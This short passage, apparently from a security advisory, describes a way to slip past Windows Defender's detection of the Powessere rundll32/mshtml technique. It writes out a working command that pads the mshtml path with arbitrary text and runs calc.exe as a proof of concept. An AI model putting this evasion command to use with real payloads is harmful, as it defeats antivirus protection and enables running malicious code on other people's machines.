Windows Defender usually blocks the execution of TrojanWin32Powessere.G, but a bypass using VBScript and ActiveX engine can allow the execution of malicious commands. By adding arbitrary text as the 2nd mshtml parameter, one can bypass the detection. For example, running rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) can execute commands despite Windows Defender protection.